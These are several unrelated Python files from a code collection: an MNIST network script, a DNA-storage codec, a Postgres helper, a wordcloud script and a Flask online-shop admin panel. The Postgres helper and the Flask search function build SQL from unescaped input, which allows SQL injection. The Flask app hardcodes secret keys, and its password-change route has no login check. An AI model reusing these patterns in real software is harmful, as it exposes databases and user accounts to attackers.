to load the data from the data path\n try:\n data = loadData(dataPath, format, self.cacheDataCheckbox.isChecked())\n except Exception:\n print('Unable to load data from %s. Skipping...' % dataPath)\n print(traceback.format_exc())\n return\n\n if format == ScanFormat.TexasTechDixon:\n configureWindow = ConfigureWindowTexasTechDixon(data, dataPath, parent=self)\n configureWindow.exec()\n elif format == ScanFormat.WashUUnknown:\n configureWindow = ConfigureWindowWashUUnknown(data, dataPath, parent=self)\n configureWindow.exec()\n elif format == ScanFormat.WashUDixon:\n configureWindow = ConfigureWindowWashUDixon(data, dataPath, parent=self)\n configureWindow.exec()\n else:\n raise ValueError('Format must be a valid ScanFormat option')\n\n # Update the cached data if it was cached\n if self.cacheDataCheckbox.isChecked():\n updateCachedData(dataPath, configureWindow.getData())\n\n @pyqtSlot()\n def closeEvent(self, closeEvent):\n # Save settings when the window is closed\n self.saveSettings()\n","sub_path":"gui/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"279410045","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 23 10:46:09 2018\r\n\r\n@author: Alexandre Boyker\r\n\"\"\"\r\nfrom helper import get_MNIST_data \r\nfrom tf_helper import reset_graph\r\nfrom dbn import DBN\r\nfrom mlp import MLP\r\nfrom sklearn.model_selection import train_test_split\r\nfrom argparse import ArgumentParser\r\n\r\n\r\nparser = ArgumentParser()\r\nparser.add_argument(\"-bt\", \"--train_bool\", dest=\"train_bool\",\r\n help=\" training for dbn boolean, default=False\", type=bool, default=False)\r\n\r\nargs = parser.parse_args()\r\ntrain_bool = args.train_bool\r\n\r\n\r\n\r\n\r\ndef main():\r\n \r\n reset_graph()\r\n #get MNIST dataset, validation set is 10% of total samples (each class is equally represented)\r\n X_train, X_val, y_train, y_val = get_MNIST_data()\r\n # parameters for Deep Belief Network training\r\n # We use layers of size 784 - 500 - 500 - 2000, as they are known to work best\r\n param = {'batch_size':100,'n_epochs':25, 'model_name':\"dbn_MNIST\", 'layers_size': [X_train.shape[1] ,500, 500, 2000]}\r\n dbn = DBN(**param)\r\n # train the dbn\r\n if train_bool:\r\n \r\n dbn.train(X_train)\r\n \r\n # get the weights of the DBN\r\n weights_dict = dbn.get_weights()\r\n initial_weights = [weights_dict[\"hidden_layer_0\"][\"W\"], weights_dict[\"hidden_layer_1\"][\"W\"], weights_dict[\"hidden_layer_2\"][\"W\"], \"default\"]\r\n initial_bias = [weights_dict[\"hidden_layer_0\"][\"b\"], weights_dict[\"hidden_layer_1\"][\"b\"], weights_dict[\"hidden_layer_2\"][\"b\"], \"default\"]\r\n \r\n \r\n # we split the validation set of MNIST 2% for training and 98 % for validation\r\n X_train, X_val, y_train, y_val = train_test_split(X_val, y_val, test_size=0.98, random_state=23)\r\n \r\n # MLP trainng with DBN weights for initialization\r\n print(\"\\n\\n MLP trained with DBN weights\")\r\n param_dict = {'n_epochs':400,'layers_size' :[784, 500, 500, 2000, 10],'initial_bias':initial_bias, 'initial_weights':initial_weights, 'model_name':'mlp_dbn_ini'}\r\n mlp = MLP(**param_dict)\r\n \r\n\r\n mlp.train(X_train, y_train, X_val, y_val)\r\n \r\n # MLP training with random Gaussian weights for initialization\r\n print(\"\\n\\nMLP trained with random standard Gaussian weights\")\r\n\r\n param_dict = {'n_epochs':400,'layers_size' :[784, 500, 500, 2000, 10],'initial_bias':None, 'initial_weights':None, 'model_name':'mlp_random_ini'}\r\n mlp = MLP(**param_dict)\r\n mlp.train(X_train, y_train, X_val, y_val)\r\n\r\nif __name__ == '__main__':\r\n \r\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"96543341","text":"\"\"\"\nName: Simple Codec (Simple DNA Storage Code)\n\nReference:\nChurch G M, Gao Y, Kosuri S. Next-generation digital information storage in DNA[J]. Science, 2012, 337(6102): 1628-1628.\n\nCoder: HaoLing ZHANG (BGI-Research)[V1]\n\nCurrent Version: 1\n\nFunction(s):\n(1) DNA encoding by Simple.\n(2) DNA decoding by Simple.\n\"\"\"\nimport random\nimport sys\n\nimport Chamaeleo.utils.monitor as monitor\nimport Chamaeleo.utils.log as log\nimport Chamaeleo.methods.components.inherent as inherent\n\n\n# noinspection PyMethodMayBeStatic,PyProtectedMember\nclass SC:\n def __init__(self, mapping_rule=None):\n \"\"\"\n introduction: The initialization method of Simple Codec.\n\n :param mapping_rule: Mapping between bases and numbers.\n There can be two settings:\n (1) Two bases correspond to a number (0 or 1): i.e. AT-0, CG-1.\n (2) Each base corresponds to a number: i.e. A-00, T-01, C-10, G-11.\n \"\"\"\n\n if not mapping_rule:\n mapping_rule = [0, 1, 1, 0]\n\n self.mapping_rule = mapping_rule\n\n self._init_check()\n\n self.file_size = 0\n self.m = monitor.Monitor()\n\n def _init_check(self):\n \"\"\"\n introduction: The verification of initialization parameters.\n \"\"\"\n if 0 <= min(self.mapping_rule) and max(self.mapping_rule) <= 1:\n if self.mapping_rule.count(0) != 2 or self.mapping_rule.count(1) != 2:\n log.output(log.ERROR, str(__name__), str(sys._getframe().f_code.co_name),\n \"Mapping rule is wrong!\")\n else:\n if (0 not in self.mapping_rule) or (1 not in self.mapping_rule) \\\n or (2 not in self.mapping_rule) or (3 not in self.mapping_rule):\n log.output(log.ERROR, str(__name__), str(sys._getframe().f_code.co_name),\n \"Mapping rule is wrong!\")\n\n # ================================================= encode part ====================================================\n\n def encode(self, matrix, size, need_log=False):\n \"\"\"\n introduction: Encode DNA sequences from the data of binary file.\n\n :param matrix: Generated binary two-dimensional matrix.\n The data of this matrix contains only 0 or 1 (non-char).\n Type: int or bit.\n\n :param size: This refers to file size, to reduce redundant bits when transferring DNA to binary files.\n Type: int\n\n :param need_log: Show the log.\n\n :return dna_sequences: The DNA sequence of len(matrix) rows.\n Type: list(string).\n \"\"\"\n self.file_size = size\n\n self.m.restore()\n\n if need_log:\n log.output(log.NORMAL, str(__name__), str(sys._getframe().f_code.co_name),\n \"Encode the matrix by Simple Codec.\")\n\n dna_sequences = []\n for row in range(len(matrix)):\n if need_log:\n self.m.output(row, len(matrix))\n dna_sequences.append(self._list_to_sequence(matrix[row]))\n\n return dna_sequences\n\n def _list_to_sequence(self, one_list):\n \"\"\"\n introduction: from one binary list to DNA sequence.\n\n :param one_list: One binary list.\n Type: int or bit.\n\n :return dna_sequence: One DNA sequence.\n Type: List(char).\n \"\"\"\n dna_sequence = []\n if 3 in self.mapping_rule:\n # unlimited mapping rule.\n if len(one_list) % 2 != 0:\n log.output(log.ERROR, str(__name__), str(sys._getframe().f_code.co_name),\n \"Data length cannot be odd number!\")\n for index in range(0, len(one_list), 2):\n dna_sequence.append(inherent.index_base.get(self.mapping_rule.index(one_list[index] * 2\n + one_list[index + 1])))\n else:\n for index in range(len(one_list)):\n options = [position for position, value in enumerate(self.mapping_rule) if value == one_list[index]]\n sliding_window = dna_sequence[-3:]\n if len(sliding_window) == 3 and len(set(sliding_window)) == 1:\n bases = list(map(inherent.index_base.get, options))\n for base in bases:\n if base != sliding_window[0]:\n dna_sequence.append(base)\n break\n else:\n dna_sequence.append(inherent.index_base.get(random.choice(options)))\n return dna_sequence\n\n # ================================================= decode part ====================================================\n\n def decode(self, dna_sequences, need_log=False):\n \"\"\"\n introduction: Decode DNA sequences to the data of binary file.\n\n :param dna_sequences: The DNA sequence of len(matrix) rows.\n Type: One-dimensional list(string).\n\n :param need_log: Show the log.\n\n :return matrix: The binary matrix corresponding to the DNA sequences.\n Type: Two-dimensional list(int).\n\n :return file_size: This refers to file size, to reduce redundant bits when transferring DNA to binary files.\n Type: int\n \"\"\"\n self.m.restore()\n\n if need_log:\n log.output(log.NORMAL, str(__name__), str(sys._getframe().f_code.co_name),\n \"Convert DNA sequences to binary matrix by Simple Codec.\")\n\n matrix = []\n for index in range(len(dna_sequences)):\n if need_log:\n self.m.output(index, len(dna_sequences))\n matrix.append(self._sequence_to_list(dna_sequences[index]))\n\n self.m.restore()\n return matrix, self.file_size\n\n def _sequence_to_list(self, dna_sequence):\n \"\"\"\n introduction: Convert one DNA sequence to one binary list.\n\n :param dna_sequence: One DNA sequence.\n Type: String.\n\n :return one_list: The binary list corresponding to the DNA sequence.\n Type: One-dimensional list(int).\n \"\"\"\n one_list = []\n if max(self.mapping_rule) == 3:\n for index in range(len(dna_sequence)):\n number = self.mapping_rule[inherent.base_index.get(dna_sequence[index])]\n one_list.append(1 if number >= 2 else 0)\n one_list.append(1 if number % 2 == 1 else 0)\n else:\n for index in range(len(dna_sequence)):\n one_list.append(self.mapping_rule[inherent.base_index.get(dna_sequence[index])])\n\n return one_list\n","sub_path":"methods/sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34647454","text":"import datetime\n\nimport psycopg2\nimport pandas as pd\n\n\nclass PSQLSession:\n def __init__(self, host, database, user, password):\n self.host = host\n self.database = database\n self.user = user\n self.password = password\n\n def __enter__(self):\n self.connection = psycopg2.connect(host=self.host,\n database=self.database,\n user=self.user,\n password=self.password)\n self.cursor = self.connection.cursor()\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self.cursor.close()\n self.connection.commit()\n self.connection.close()\n\n def query(self, text):\n self.cursor.execute(text)\n data = pd.DataFrame(self.cursor.fetchall(),\n columns=[desc[0]\n for desc in self.cursor.description])\n return data\n\n def check_record_existance(self, table, data):\n query_text = '''SELECT id FROM {} WHERE {};'''.format(table,\n ' AND '.join(self.to_string_dict(data)))\n\n # print(query_text)\n self.cursor.execute(query_text)\n result = self.cursor.fetchall()\n return result[0][0] if len(result) > 0 else None\n\n def insert_query(self, table, columns, data, return_id=False, multiple=False):\n if multiple:\n query_text = '''INSERT INTO {}({}) VALUES {}'''.format(table, ', '.join(columns),\n '(' + '), ('.join([self.to_string_values(v, columns) for v in data]) + ')')\n else:\n query_text = '''INSERT INTO {}({}) VALUES {}'''.format(table, ', '.join(columns),\n '(' + self.to_string_values(data, columns) + ')')\n if return_id:\n query_text += ' RETURNING id'\n\n query_text += ';'\n\n # print(query_text)\n self.cursor.execute(query_text)\n\n if return_id:\n v = [id[0] for id in self.cursor.fetchall()]\n return v if multiple else v[0]\n\n def _get_query_elements(self, data, type='insert'):\n # delete pd.nan values\n deletable = []\n for k in data.keys():\n if pd.isna(data[k]):\n deletable.append(k)\n for k in deletable:\n del(data[k])\n\n keys = data.keys()\n\n values = [str(v) if not isinstance(v, str) and not isinstance(v, datetime.date)\n else '\\'{}\\''.format(v.replace('\\'', '\"'))\n for v in data.values()]\n if type == 'insert':\n return ', '.join(keys), ', '.join(values)\n elif type == 'select':\n return ' AND '.join(['{}={}'.format(key, value) for key, value in zip(keys, values)])\n\n def to_string_values(self, data, columns):\n output = []\n for col_name in columns:\n if col_name in data:\n # none value\n if data[col_name] is None or pd.isna(data[col_name]):\n v = 'NULL'\n elif not isinstance(data[col_name], str): # numeric value\n v = str(data[col_name])\n else: # string value\n v = '\\'{}\\''.format(data[col_name].replace('\\'', '\"'))\n else:\n v = 'NULL'\n output.append(v)\n return ', '.join(output)\n\n def to_string_dict(self, data):\n return ['{}={}'.format(key, str(v)\n if not isinstance(value, str)\n else '\\'{}\\''.format(value.replace('\\'', '\"')))\n for key, value in data.items()]\n","sub_path":"src/poe_price/data/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214131539","text":"import pandas as pd\nimport numpy as np \nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom subprocess import check_output\nfrom wordcloud import WordCloud, STOPWORDS\n\ndf = pd.read_json('facebookmessage.json')\ndict1 = pd.DataFrame.from_dict(data)\ndict1 = pd.DataFrame.from_dict(data['messages'])\ndict1 = pd.DataFrame.from_dict(data['messages'])\n\nmessages = dict1[dict1['type']=='generic']\nmessages = dict1[dict1['type']=='Generic']\n\n\nmpl.rcParams['figure.figsize']=(8.0,6.0) #(6.0,4.0)\nmpl.rcParams['font.size']=12 #10 \nmpl.rcParams['savefig.dpi']=100 #72 \nmpl.rcParams['figure.subplot.bottom']=.1 \n\n\nstopwords = set(STOPWORDS)\n\n\nwordcloud = WordCloud(\n background_color='white',\n stopwords=stopwords,\n max_words=200,\n max_font_size=40, \n random_state=42\n ).generate(str(messages['content']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.show()\ntext = \" \".join(review for review in messages.content)\nprint (\"There are {} words in the combination of all review.\".format(len(text)))\ntext = \" \".join(str(review) for review in messages.content)\nprint (\"There are {} words in the combination of all review.\".format(len(text)))\nstopwords = set(STOPWORDS)\nstopwords.update([\"drink\", \"now\", \"wine\", \"flavor\", \"flavors\"])\n\n# Generate a word cloud image\nwordcloud = WordCloud(stopwords=stopwords, background_color=\"white\").generate(text)\n\n# Display the generated image:\n# the matplotlib way:\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nmessages = messages[messages[['files', 'gifs', 'missed', 'photos', 'reactions','share','stickers','videos']== 'nan']]\nmessages = messages[messages['photos']== 'nan']\nmessages = dict1[dict1['type']=='Generic']\nmessages.dropna(thresh=2)\nmessages.dropnan(thresh=2)\ntest = messages[['photos'] == 'nan']\ntest = messages['photos'] == 'nan'\nmessages.info()\ntest = messages.dropna(subset = ['photos','gifs','videos'])\nstopwords = set(STOPWORDS)\nstopwords.update([\"mother\", \"sara\", \"head\", \"flavor\", \"flavors\"])\n\n# Generate a word cloud image\nwordcloud = WordCloud(stopwords=stopwords, background_color=\"white\").generate(text)\n","sub_path":"FacebookMessageWordcloud/FacebookMessageWordcloud.py","file_name":"FacebookMessageWordcloud.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"45971848","text":"import sys\n\nif len(sys.argv) != 3:\n print(\"\\nERRO Sintaxe: python3 script_arrumador.py \\n\")\n exit()\n\narquivo_entrada = sys.argv[1]\narquivo_saida = sys.argv[2]\t\n\narquivo = open(arquivo_entrada, 'r')\narquivo2 = open(arquivo_saida, 'w')\n\nfor linha in arquivo:\n escrita = ''\n cont = linha.split('\\t')\n escrita = 'i ' + cont[1] + ' ' + cont[9].strip() + ' 80 ' + cont[7]+ ' ' + cont[0] + ' 70 40 5,'+cont[3]+ ','+cont[4]+','+cont[5]+','+cont[6]\n arquivo2.write(escrita+'\\n')\n\n\narquivo2.close()\narquivo.close()\n","sub_path":"Caracterizacao/script_arrumador.py","file_name":"script_arrumador.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294789559","text":"from flask_env import MetaFlaskEnv\nimport mysql.connector\nfrom mysql.connector import pooling\nfrom flask_wtf.csrf import CSRFProtect, CSRFError\nfrom datetime import timedelta\nfrom flask import Flask, render_template, redirect, url_for, make_response, request, flash, session\nimport uuid\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired\nimport argon2\nimport json\nimport base64\nfrom filedownload import FileDownload\nfrom fileupload import FileUpload\nimport os\nimport ast\nfrom datetime import datetime\nfrom argon2 import PasswordHasher\n\nclass Configuration(metaclass=MetaFlaskEnv):\n SECRET_KEY = \"adminonlineshopsecretkey\"\n WTF_CSRF_SECRET_KEY = \"adminonlineshopsecretkey\"\n WTF_CSRF_TIME_LIMIT = 604800\n COOKIE = \"ADMIN-ONLINE-SHOP-KEY\"\n ADMIN_USER = \"USER\"\n HOST = \"127.0.0.1\"\n DB = \"online-shop\"\n USERS = \"admin\"\n PASSWORD = \"xxxx\"\n PORT = 3306\n ITEMS_TABLE = \"items\"\n ORDERS_TABLE = \"orders\"\n UPLOAD_TABLE = \"upload\"\n PRODUCTS_TABLE = \"products\"\n USERS_TABLE = \"users\"\n MESSAGES_TABLE = \"messages\"\n MINIO_API_URL = \"xxxx:9000\"\n MINIO_ACCESS_KEY = \"xxx\"\n MINIO_SECRET_KEY = \"xxx\"\n MINIO_SECURE = False\n MINIO_BUCKET_NAME = \"byape\"\n UPLOAD_PATH = '/tmp'\n\napp = Flask(__name__)\napp.config['PERMANENT_SESSION_LIFETIME'] = timedelta(hours=1)\ncsrf = CSRFProtect(app)\n\n@app.errorhandler(CSRFError)\ndef handle_csrf_error(e):\n form = LoginForm()\n return render_template('login.html', form=form, message=\"Session expired: {}\".format(e.description))\n\n\nclass LoginForm(FlaskForm):\n username = StringField('username', validators=[DataRequired()])\n password = PasswordField('password', validators=[DataRequired()])\n\ndef from_js_to_python_deserialize(b64data):\n \"\"\"\n b64 encoded byte stream -> b64 decoded byte stream -> json string -> python dictionary.\n The js side use: JSON.stringify() -> btoa()\n :param b64data: Base 64 encoded data\n :return: python dictionary\n \"\"\"\n ret = {}\n try:\n ret = json.loads(base64.b64decode(b64data).decode('utf-8'))\n except:\n pass\n finally:\n return ret\n\ndef from_python_to_js_serialization(pythondict):\n \"\"\"\n pythondict -> json string -> byte array -> b64 encode\n The js side use: string.replace() to remove ' garbage -> JSON.parse() -> atob()\n :param pythondict:\n :return:\n \"\"\"\n return base64.b64encode(json.dumps(pythondict).encode('utf-8'))\n\ndef update_product(id, title, description, price, images):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_update_query = f\"update {app.config['ITEMS_TABLE']} set title=%s, description=%s, price=%s, images=%s where id=%s\"\n try:\n c.execute(mysql_update_query,(title, description, price, images, id))\n conn.commit()\n ret = 'Inserted', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\n\ndef add_product(title, description, price, images):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_add_query = f\"insert into {app.config['ITEMS_TABLE']} (title, description, price, images) values (%s,%s,%s,%s)\"\n try:\n c.execute(mysql_add_query,(title, description, price, images))\n conn.commit()\n ret = 'Inserted', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef get_product_by_id(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select * from {app.config['ITEMS_TABLE']} where id=%s\"\n c.execute(mysql_select_query, (id,))\n product = c.fetchone()\n if product is not None:\n if product[4] is not None:\n images = ast.literal_eval(product[4])\n resp = {'id': product[0], 'title': product[1], 'description': product[2], 'price': product[3],\n 'images': images}\n else:\n resp = {'id': product[0], 'title': product[1], 'description': product[2], 'price': product[3]}\n else:\n resp = {}\n c.close()\n conn.close()\n return resp\n\ndef get_products():\n response = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select * from {app.config['ITEMS_TABLE']}\"\n c.execute(mysql_select_query)\n products = c.fetchall()\n if len(products) != 0:\n for product in products:\n if product[4] is not None:\n images = ast.literal_eval(product[4])\n resp = {'id':product[0], 'title': product[1], 'description': product[2], 'price': product[3], 'images': images}\n else:\n resp = {'id': product[0], 'title': product[1], 'description': product[2], 'price': product[3]}\n response.append(resp)\n c.close()\n conn.close()\n return response\n\n\ndef get_name_item(itemid,identified):\n conn = cnxpool.get_connection()\n c = conn.cursor(buffered=True)\n mysql_select_query = f\"select i.title, p.quantity, p.price from {app.config['ITEMS_TABLE']} i join {app.config['PRODUCTS_TABLE']} p on \" \\\n f\"i.id = p.itemid where p.itemid = %s and p.identified = %s\"\n c.execute(mysql_select_query, (itemid, identified))\n item = c.fetchone()\n if item is not None:\n ret = {'item': item[0], 'quantity': item[1], 'price': item[2]}\n else:\n ret = {}\n c.close()\n conn.close()\n return ret\n\ndef get_order_itemid(identified):\n ids = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select itemid from {app.config['PRODUCTS_TABLE']} where identified = %s\"\n c.execute(mysql_select_query, (identified,))\n itemids = c.fetchall()\n if len(itemids) != 0:\n for id in itemids:\n ids.append(id[0])\n c.close()\n conn.close()\n return ids\n\ndef get_order_by_identified():\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select identified from {app.config['ORDERS_TABLE']} order by time desc\"\n c.execute(mysql_select_query)\n orders = c.fetchall()\n if len(orders) != 0:\n ret = orders\n else:\n ret = []\n c.close()\n conn.close()\n return ret\n\ndef get_items(date):\n results = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select identified, name, email, phone, address, city, payment, total, time, dayship, timeship, ordercode, note, checked from \" \\\n f\"{app.config['ORDERS_TABLE']} where identified = %s and date(time) = %s\"\n orders = get_order_by_identified()\n for order in orders:\n quantity = []\n ids = get_order_itemid(order[0])\n for id in ids:\n quantity.append(get_name_item(id,order[0]))\n c.execute(mysql_select_query, (order[0], date))\n resp = c.fetchone()\n if resp is not None:\n day_raw = resp[9].split('-')\n day = day_raw[2] + '/' + day_raw[1] + '/' + day_raw[0]\n results.append({'identified': resp[0], 'name': resp[1], 'email': resp[2], 'phone': resp[3], 'address': resp[4],\n 'city': resp[5], 'payment': resp[6], 'total':resp[7], 'timeorder':resp[8].strftime('%H:%M %d/%m/%Y'),\n 'dayship': day, 'timeship': resp[10], 'code': resp[11], 'note': resp[12], 'checked': resp[13],'detail': quantity})\n c.close()\n conn.close()\n return results\n\ndef delete_item(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_delete_query = f\"delete from {app.config['ITEMS_TABLE']} where id=%s\"\n try:\n c.execute(mysql_delete_query, (id,))\n conn.commit()\n ret = 'Item deleted', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef delete_msg(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_delete_query = f\"delete from {app.config['MESSAGES_TABLE']} where id=%s\"\n try:\n c.execute(mysql_delete_query, (id,))\n conn.commit()\n ret = 'Item deleted', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\n\ndef displayfunction(viewstate):\n orders = []\n current = datetime.now().strftime('%H:%M:%S %d/%m/%Y')\n user = session.get('user')\n email = session.get('email')\n telephone = session.get('telephone')\n if len(viewstate) == 0:\n try:\n current_date = datetime.now().strftime('%Y-%m-%d')\n orders = get_items(current_date)\n except Exception as e:\n flash('Error: {}'.format(str(e)))\n pass\n viewstate = from_python_to_js_serialization(viewstate)\n numbResults = len(orders)\n return render_template('index.html', user=user, viewstate=viewstate, results=numbResults, datas=orders, current=current, email=email, telephone=telephone)\n\n\ndef login_function(form):\n user_name = form.username.data\n user_pass = form.password.data\n ph = argon2.PasswordHasher()\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select password, username, email, telephone from {Configuration.USERS_TABLE} where username = %s LIMIT 1\"\n c.execute(mysql_select_query, (user_name,))\n record = c.fetchone()\n if record is not None:\n try:\n if ph.verify(record[0], user_pass) is True:\n ret = {'user': record[1], 'email':record[2], 'telephone':record[3], 'message':'authsuccess'}\n code = 200\n session[\"if_logged\"] = True\n session['user'] = record[1]\n session['email'] = record[2]\n session['telephone'] = record[3]\n except (argon2.exceptions.VerifyMismatchError, argon2.exceptions.VerificationError):\n ret = {'message': 'Login incorrect'}\n code = 401\n else:\n ret = {'message': 'Login incorrect'}\n code = 401\n c.close()\n conn.close()\n return ret, code\n\ndef search_function(keyword):\n result = []\n quantity = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select identified, name, email, phone, address, city, payment, total, time, dayship, timeship, ordercode, note from {app.config['ORDERS_TABLE']}\" \\\n f\" where email like '%{keyword}%' or phone like '{keyword}%' or ordercode like '{keyword}%'\"\n c.execute(mysql_select_query)\n records = c.fetchall()\n if len(records) !=0:\n for resp in records:\n ids = get_order_itemid(resp[0])\n for id in ids:\n quantity.append(get_name_item(id, resp[0]))\n day_raw = resp[9].split('-')\n day = day_raw[2] + '/' + day_raw[1] + '/' + day_raw[0]\n result.append({'identified': resp[0], 'name': resp[1], 'email': resp[2], 'phone': resp[3], 'address': resp[4],\n 'city': resp[5], 'payment': resp[6], 'total': resp[7], 'timeorder': resp[8].strftime('%H:%M %d/%m/%Y'),\n 'dayship': day, 'timeship': resp[10], 'code': resp[11], 'note': resp[12], 'detail': quantity})\n ret = {'keyword': keyword, 'results': result}\n code = 200\n else:\n ret = {'message': 'Search does not exist'}\n code = 404\n c.close()\n conn.close()\n return ret, code\n\ndef check_done_function(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n check = 1\n mysql_update_query = f\"update {app.config['ORDERS_TABLE']} set checked=%s where identified=%s\"\n try:\n c.execute(mysql_update_query, (check,id))\n conn.commit()\n ret = 'Updated', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef check_undone_function(id):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n check = 0\n mysql_update_query = f\"update {app.config['ORDERS_TABLE']} set checked=%s where identified=%s\"\n try:\n c.execute(mysql_update_query, (check,id))\n conn.commit()\n ret = 'Updated', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef profilechange(email,telephone,user):\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_update_query = f\"update {app.config['USERS_TABLE']} set email=%s,telephone=%s where username=%s\"\n try:\n c.execute(mysql_update_query, (email,telephone,user))\n conn.commit()\n ret = 'Updated', 200\n except Exception as e:\n ret = str(e), 404\n c.close()\n conn.close()\n return ret\n\ndef passchange(user, curpass, newpass):\n current_user = user\n current_pass = curpass\n newpass = newpass\n conn = cnxpool.get_connection()\n c = conn.cursor()\n ph = PasswordHasher()\n mysql_select_query = f\"select username, password, enable from {Configuration.USERS_TABLE} where username = %s LIMIT 1\"\n c.execute(mysql_select_query, (current_user,))\n record = c.fetchone()\n try:\n if ph.verify(record[1], current_pass) is True:\n mysql_update_query = f\"update {Configuration.USERS_TABLE} set password = %s where username = %s\"\n mysql_update_tuple = (ph.hash(newpass), current_user)\n c.execute(mysql_update_query, mysql_update_tuple)\n conn.commit()\n ret = {'username': current_user}\n code = 200\n except (argon2.exceptions.VerifyMismatchError, argon2.exceptions.VerificationError) as e:\n ret = {'message': f\"Password change failed because {str(e)}\"}\n code = 404\n c.close()\n conn.close()\n return ret, code\n\ndef get_messages_by_date(date):\n results = []\n conn = cnxpool.get_connection()\n c = conn.cursor()\n mysql_select_query = f\"select * from {app.config['MESSAGES_TABLE']} where date(time)=%s\"\n c.execute(mysql_select_query, (date,))\n records = c.fetchall()\n if records is not None:\n for record in records:\n res = {'id': record[0], 'name': record[1], 'phone': record[2], 'subject': record[3], 'message': record[4], 'time': record[5].strftime('%H:%M %d/%m/%Y')}\n results.append(res)\n ret = results\n code = 200\n else:\n ret = results\n code = 404\n c.close()\n conn.close()\n return ret, code\n\n@app.route('/')\ndef root():\n resp = redirect(url_for('login'))\n return resp\n\n@app.route('/menu', methods=['GET', 'POST'])\ndef menu():\n if session.get('if_logged') is not None:\n return displayfunction(viewstate={})\n else:\n flash('You need to login first')\n return redirect('/login', code=302)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n session.permanent = True\n form = LoginForm()\n if form.validate_on_submit():\n # Make openapi login query with username and password\n try:\n login_systems = login_function(form)\n if login_systems[1] == 200:\n # If response is code 200 --> get apikey and set cookie\n resp = make_response(redirect(\"/menu\"))\n else: \n # If response is code 401 --> redirect to error login page\n flash(f\"{login_systems[0]['message']}\")\n resp = render_template('login.html', form=form)\n return resp\n except Exception as e:\n session.clear()\n flash(f\"{str(e)}\")\n return render_template('login.html', form=form)\n return render_template('login.html', form=form)\n\n@app.route('/logout')\ndef logout():\n resp = make_response(render_template('login.html', form=LoginForm(), message=\"Session Expired\"))\n session.clear()\n return resp\n\n@app.route('/check', methods=['POST'])\ndef check():\n id = request.form.get('id')\n try:\n check_done_function(id)\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n@app.route('/uncheck', methods=['POST'])\ndef uncheck():\n id = request.form.get('id')\n try:\n check_undone_function(id)\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n@app.route('/changeprofile', methods=['POST'])\ndef changemailform():\n email = request.form.get('newmail')\n phone = request.form.get('newphone')\n user = session['user']\n try:\n change = profilechange(email,phone,user)\n if change[1] == 200:\n flash('Profile successful changed')\n else:\n flash('Failed to change')\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n\n@app.route('/changepassword', methods=['POST'])\ndef changepassword():\n curpass = request.form.get('curpass')\n newpass = request.form.get('newpass')\n user = session['user']\n try:\n passchange(user,curpass,newpass)\n flash('Password successful changed')\n except Exception as e:\n session.clear()\n flash(str(e))\n return redirect('/menu')\n\n@app.route('/message', methods=['GET', 'POST'])\ndef message():\n if session.get('if_logged') is not None:\n user = session.get('user')\n messages = []\n if request.method == 'POST':\n datepicker = request.form.get('date').split('T')\n date = datepicker[0]\n try:\n msg = get_messages_by_date(date)\n if msg[1] == 200:\n flash(f\"Found total {len(msg[0])} message\")\n messages.extend(msg[0])\n else:\n flash(\"No message found\")\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n else:\n try:\n current_date = datetime.now().strftime('%Y-%m-%d')\n msg = get_messages_by_date(current_date)\n if msg[1] == 200 and len(msg[0]) > 0:\n flash(f\"Found total {len(msg[0])} message\")\n messages.extend(msg[0])\n else:\n flash(\"No message found\")\n except Exception as e:\n session.clear()\n flash('Error: {}'.format(str(e)))\n pass\n return 